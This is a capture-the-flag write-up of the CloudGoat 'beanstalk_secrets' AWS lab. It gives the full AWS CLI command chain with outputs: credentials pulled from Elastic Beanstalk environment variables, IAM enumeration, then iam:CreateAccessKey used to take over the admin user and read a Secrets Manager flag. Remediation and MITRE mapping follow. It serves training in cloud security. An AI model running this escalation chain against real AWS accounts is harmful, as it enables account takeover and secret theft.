🥷 CloudGoat: Beanstalk Secrets (AWS CLI)

Write-up: From low-privilege user to admin (AWS CLI approach)

📅 2026-01-11

🧭 Overview

Scenario: beanstalk_secrets
Platform: CloudGoat (Rhino Security Labs)
Tools: AWS CLI (no exploitation frameworks)
Objective: Extract secrets from Elastic Beanstalk, escalate to admin, and retrieve the flag.

⚔️ Attack Path Summary

Low-Priv User → Beanstalk Enum → Secondary Creds → IAM Enum → CreateAccessKey → Admin → Flag

🔑 Phase 1: Initial Access

Configure Low-Privilege Profile


aws configure --profile ebs-1
# Access Key: AKIA****************
# Secret Key: EOyTyXYE/DwNCFAHmFSla5SWz**************

Validate Credentials


aws sts get-caller-identity --profile ebs-1


{
  "UserId": "AIDA****************",
  "Account": "7912********",
  "Arn": "arn:aws:iam::7912********:user/cgid09kivyz0ga_low_priv_user"
}

🔎 Phase 2: Elastic Beanstalk Enumeration

List Applications


aws elasticbeanstalk describe-applications --profile ebs-1

Found: cgid09kivyz0ga-app - "Elastic Beanstalk application for insecure secrets scenario"

List Environments


aws elasticbeanstalk describe-environments --profile ebs-1

Property	Value
Environment	`cgid09kivyz0ga-env`
Application	`cgid09kivyz0ga-app`
Platform	Python 3.11 on Amazon Linux 2023
Status	Ready

Extract Configuration Settings


aws elasticbeanstalk describe-configuration-settings \
  --application-name cgid09kivyz0ga-app \
  --environment-name cgid09kivyz0ga-env \
  --query "ConfigurationSettings[0].OptionSettings[?Namespace=='aws:elasticbeanstalk:application:environment']" \
  --output table \
  --profile ebs-1

Namespace	Name	Value
`aws:elasticbeanstalk:application:environment`	`PYTHONPATH`	`/var/app/venv/staging-LQM1lest/bin`
`aws:elasticbeanstalk:application:environment`	`SECONDARY_ACCESS_KEY`	`AKIA****************`
`aws:elasticbeanstalk:application:environment`	`SECONDARY_SECRET_KEY`	`19jM1vKF4UQqw8vJo6FwKKxd**************`

Credentials extracted from environment variables.

👤 Phase 3: Pivot to Secondary User

Configure Secondary Profile


aws configure --profile ebs-2
# Access Key: AKIA****************
# Secret Key: 19jM1vKF4UQqw8vJo6FwKKxd**************

Validate Credentials


aws sts get-caller-identity --profile ebs-2

Confirmed: cgid09kivyz0ga_secondary_user

🗄️ Phase 4: IAM Enumeration

Enumeration Workflow


list-users → list-attached-user-policies → get-policy → get-policy-version

List All Users


aws iam list-users --profile ebs-2

Username	Note
`cgid09kivyz0ga_admin_user`	Target
`cgid09kivyz0ga_low_priv_user`	Initial access
`cgid09kivyz0ga_secondary_user`	Current user

Enumerate Secondary User's Policies


aws iam list-attached-user-policies \
  --user-name cgid09kivyz0ga_secondary_user \
  --profile ebs-2


{
  "AttachedPolicies": [
    {
      "PolicyName": "cgid09kivyz0ga_secondary_policy",
      "PolicyArn": "arn:aws:iam::7912********:policy/cgid09kivyz0ga_secondary_policy"
    }
  ]
}

Get Policy Details


aws iam get-policy \
  --policy-arn arn:aws:iam::7912********:policy/cgid09kivyz0ga_secondary_policy \
  --profile ebs-2

Noted DefaultVersionId: v1

Extract Policy Document


aws iam get-policy-version \
  --policy-arn arn:aws:iam::7912********:policy/cgid09kivyz0ga_secondary_policy \
  --version-id v1 \
  --profile ebs-2


{
  "Statement": [
    {
      "Action": [
        "iam:CreateAccessKey"
      ],
      "Effect": "Allow",
      "Resource": "*"
    },
    {
      "Action": [
        "iam:ListRoles",
        "iam:GetRole",
        "iam:ListPolicies",
        "iam:GetPolicy",
        "iam:ListPolicyVersions",
        "iam:GetPolicyVersion",
        "iam:ListUsers",
        "iam:GetUser",
        "iam:ListGroups",
        "iam:GetGroup",
        "iam:ListAttachedUserPolicies",
        "iam:ListAttachedRolePolicies",
        "iam:GetRolePolicy"
      ],
      "Effect": "Allow",
      "Resource": "*"
    }
  ]
}

Critical Finding

Permission	Resource	Impact
`iam:CreateAccessKey`	`*` (wildcard)	Can create access keys for ANY user, including admin

💥 Phase 5: Privilege Escalation

Create Access Key for Admin User


aws iam create-access-key \
  --user-name cgid09kivyz0ga_admin_user \
  --profile ebs-2


{
  "AccessKey": {
    "UserName": "cgid09kivyz0ga_admin_user",
    "AccessKeyId": "AKIA****************",
    "Status": "Active",
    "SecretAccessKey": "C8aC3UMs1rMewHHLwAHxxk4T**************"
  }
}

Configure Admin Profile


aws configure --profile admin
aws sts get-caller-identity --profile admin


{
  "UserId": "AIDA****************",
  "Account": "7912********",
  "Arn": "arn:aws:iam::7912********:user/cgid09kivyz0ga_admin_user"
}

Privilege escalation successful.

🚩 Phase 6: Capture the Flag

List Secrets


aws secretsmanager list-secrets --profile admin --region us-east-1

Found: cgid09kivyz0ga_final_flag

Retrieve Flag


aws secretsmanager get-secret-value \
  --secret-id cgid09kivyz0ga_final_flag \
  --profile admin \
  --region us-east-1


FLAG{D0nt_st0r3_s3cr3ts_in_b3@nsta1k!}

📐 Attack Chain Diagram


┌─────────────────────┐
│   Low-Priv User     │
│   (ebs-1 profile)   │
└──────────┬──────────┘
           │ elasticbeanstalk:DescribeConfigurationSettings
           ▼
┌─────────────────────┐
│  Beanstalk Secrets  │
│  - Access Key       │
│  - Secret Key       │
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│  Secondary User     │
│   (ebs-2 profile)   │
└──────────┬──────────┘
           │ iam:CreateAccessKey (Resource: *)
           ▼
┌─────────────────────┐
│    Admin User       │
│  (admin profile)    │
└──────────┬──────────┘
           │ secretsmanager:GetSecretValue
           ▼
┌─────────────────────┐
│       FLAG          │
└─────────────────────┘

🚨 Vulnerabilities Exploited

#	Vulnerability	CWE
1	Hardcoded credentials in Beanstalk environment variables	CWE-798
2	Overly permissive IAM policy (`iam:CreateAccessKey` on `*`)	CWE-732
3	Lack of least privilege principle	CWE-250

💡 Remediation

Do not store long-lived AWS credentials in environment variables - Use AWS Secrets Manager or SSM Parameter Store

Restrict iam:CreateAccessKey - Scope to self only:


 {
   "Effect": "Allow",
   "Action": "iam:CreateAccessKey",
   "Resource": "arn:aws:iam::*:user/${aws:username}"
 }

Enable CloudTrail alerts for CreateAccessKey API calls
Regular IAM Access Analyzer scans to detect overly permissive policies

🎯 MITRE ATT&CK Mapping

Tactic	Technique	ID
Credential Access	Unsecured Credentials: Credentials in Files / Environment Variables	T1552.001
Discovery	Cloud Service Discovery	T1526
Privilege Escalation	Valid Accounts: Cloud Accounts	T1078.004
Persistence	Account Manipulation: Additional Cloud Credentials	T1098.001

🛠️ Commands Reference


# Beanstalk Enumeration
aws elasticbeanstalk describe-applications
aws elasticbeanstalk describe-environments
aws elasticbeanstalk describe-configuration-settings --application-name X --environment-name Y

# IAM Enumeration Workflow
aws iam list-users
aws iam list-attached-user-policies --user-name X
aws iam list-user-policies --user-name X
aws iam get-policy --policy-arn X
aws iam get-policy-version --policy-arn X --version-id vN

# Privilege Escalation
aws iam create-access-key --user-name X

# Secrets Manager
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id X

#cloudgoat #aws #awscli #beanstalk #iam #privesc #exploit #vulnerability

Share this post on: